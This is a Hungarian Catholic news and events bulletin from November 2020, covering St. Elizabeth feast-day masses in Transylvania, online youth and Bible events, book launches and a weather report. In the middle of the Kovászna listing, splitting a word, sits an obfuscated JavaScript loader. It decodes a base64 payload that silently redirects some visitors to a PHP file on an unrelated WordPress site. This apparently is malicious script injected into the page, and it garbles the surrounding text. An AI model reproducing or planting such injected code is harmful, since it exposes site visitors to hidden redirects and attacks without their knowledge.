2020. november 17. – Hírek és programajánló

H Í R E K   D É L B E N

Szent Erzsébet napi búcsúk és ünnepségek
A gyulafehérvári főegyházmegyében a kolozsvári Piarista-templomban november 19-én, reggel fél 8 órától a román nyelvű, este 6 órától a magyar nyelvű, a Szent István templomban délután 5 órától kezdődő  szentmiséken kenyér és rózsaáldás lesz. Buzdítva hívnak a találékony és törődő jóság jelképeit használni: megosztani a megáldott, elvitelre szánt kenyeret családjainkkal, a férjek, édesapák, udvarló ifjak pedig ragaszkodásuk vörös rózsájának illatával mondhatják el szeretetük miértjét.
Esztelnek filiájában, Kézdicsomortán templomában csütörtökön, november 19-én, délelőtt 11 órakor kezdődik a búcsú. Az ünnepi szentmise szónoka Kacsó Sándor kézdialmási plébános.
nagyenyedi plébániatemplom búcsúját csütörtökön, délután 5 órától tartják. Az ünnepi szentmise főcelebránsa Kerekes László segédpüspök, szónoka pedig Bálint Emil felcsíki főesperes, a csíkszeredai Szent Ágoston egyházközség plébánosa.
Marosvásárhelymeggyesfalvi Szent Erzsébet-templom búcsúját szintén november 19-én, csütörtökön ünneplik. A délután 5 órakor kezdődő szentmisén Boros Károly nyugalmazott plébános tartja a szentbeszédet.
Szent Erzsébet-búcsút ünnepelnek a kőhalmi plébániához tartozó állomási templomban is. November 19-én, csütörtökön, a délután 4 órakor kezdődő szentmisén Bátor Botond pálos atya prédikál Hargitafürdőről.
Úzvölgyében november 21-én, szombaton déli 12 órakor lesz a búcsú. Az ünnepi szentbeszédet Málnási Demeter gyimesközéploki plébános tartja.
Kovászna leányegyházközségében, Kommfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andón a búcsút, november 22-én, vasárnap délután 3 órakor tartják. A szentmise szónoka Marek Bernardin ferences atya, Esztelnekről.

Rendhagyó lány és asszonytalálkozó
Az Áradat Egyesület szervezésében online tartják meg december 1.én délután 2 és este 7 óra között a X. Lány- és Asszonytalálkozót, amelynek témája: testi-lelki-szellemi és spirituális egyensúlyom.
Jelentkezni az office@aradat.ro e-mail-címen lehet, a részvételi díj 100 lej.
A meghívottak előadások és kerekasztalbeszélgetések keretében beszélnek a testkultúráról, testtudatosságról, karanténban, kórházban és otthon megélhető lelki-szellemi-emberi oázisainkról, és a spirituális mélységek és magasságok kihívásairól, az idők jeleiről.

Online biblianap
A Katolikus Magyar Bibliatársulat szervezésében online biblianap lesz december 5-én délelőtt 10 órától, melynek keretében Advent megélése az Énekek éneke tükrében címmel Bodor Attila teológiai tanár tart előadást.
Bejelentkezni november 28-ig lehet az agota.molnar@yahoo.com e-mail-címen vagy a 0761-300 634-es telefonszámon.

Időjárás: Egy hidegfront érkezik napközben helyenként kisebb esővel, majd a csapadék jelentős része a délutáni, esti órákban érkezhet nyugat felől. Helyenként élénk, erős lesz az északnyugati szél. Délután 7-13 fokot mérhetünk.
A borongós időben felerősödhetnek az ízületi fájdalmak, görcsös panaszok jelentkezhetnek, sajoghatnak végtagjaink. Alacsony lehet hő- és komfortérzetünk, ezért ajánlott a meleg, réteges öltözet. Nagy lesz a megfázásveszély. A nyirkos idő kedvez a kórokozók terjedésének, ezért erősítsük immunrendszerünket.

H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a hatolykai templomban tartanak örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

Online ifjúsági szentségimádás
A Főegyházmegyi Ifjúsági Főlelkészség szervezésében, ma este 7 órától online ifjúsági dicsőítő estre kerül sor. A zenei szolgálatot a Psallite zenekar látja el. A szentségimádásba a FIF youtube csatornáján keresztül lehet bekapcsolódni.

Ifjúsági programok Temesváron
A katolikus egyetemisták számára ma este 8 és 9 óra között szentségimádást tartanak. November 21-én, szombaton délelőtt 10 és délután 5 óra között spirituális work-shop-ot tartanak, amelynek témája: A szentek és a Szentírás. Helyszín: Temesvár, 1 Decembrie utca 1-es szám.

Online könyvbemutató és beszélgetés
A kolozsvári Verbum Keresztény Kulturális Egyesület online könyvbemutatót tartholnap este 6 órakor. Margaret Silf A káosz túloldala. Letörés helyett áttörés című kötete jó lelki segítség, támasz lehet ezekben az időkben, amikor az életünk sokat változott.
Margaret Silf nemzetközileg elismert brit lelkiségi író, lelkigyakorlat-kísérő és előadó. Az évtizedeken át a számítógépes iparban dolgozó családanya a szentignáci lelkiségben talált otthonra. Frissességgel teli írásai a tapasztalatilag megalapozott tudást közérthető nyelven tárják az olvasók elé, elkísérve őt saját felfedezőútján.
Bejelentkezni illetve az eseményen részt venni a Verbum Keresztény Kulturális Egyesület, a templom. ro, valamint a romkat.ro és Vasárnap hetilap FB-oldalokon keresztül lehet.
Közreműküdnek: Bereczki Silvia segítőnővér, a könyv fordítója; Cosma István pszichológus; Demeter Zsuzsa gyógypedagógus és Szőcs Csaba plébános, a Verbum kiadó igazgatója.

Előadás Csíkszeredában
A Katolikus Magyar Bibliatársulat  szervezésében Erőszakmentesség a Biblia tükrében címmel előadást tart Kedves Rita segítőnővér, november 21-én szombaton reggel 9 órától a csíkszeredai Szent Ágoston plébánián.

Könyvbemutató Csíkzsögödön
A csíkzsögödi plébániatemplomban november 22-én, vasárnap a délelőtt 9 és fél 11 órakor kezdődő szentmisék után bemutatják a Van emberem! Szeretetszolgálat Erdélyben című riportkötetet, amely a Gyulafehérvári Caritas három évtizedes történetét, szeretetszolgálatának alakulását, mibenlétét és fejlődését mutatja be.

Időjárás: Egy hidegfront érkezik napközben helyenként kisebb esővel, majd a csapadék jelentős része a délutáni, esti órákban érkezhet nyugat felől. Helyenként élénk, erős lesz az északnyugati szél. Délután 7-13 fokot mérhetünk.
A borongós időben felerősödhetnek az ízületi fájdalmak, görcsös panaszok jelentkezhetnek, sajoghatnak végtagjaink. Alacsony lehet hő- és komfortérzetünk, ezért ajánlott a meleg, réteges öltözet. Nagy lesz a megfázásveszély. A nyirkos idő kedvez a kórokozók terjedésének, ezért erősítsük immunrendszerünket.

MRE Hírszolgálat, 2020. november 17.

About the author

majoros gabriella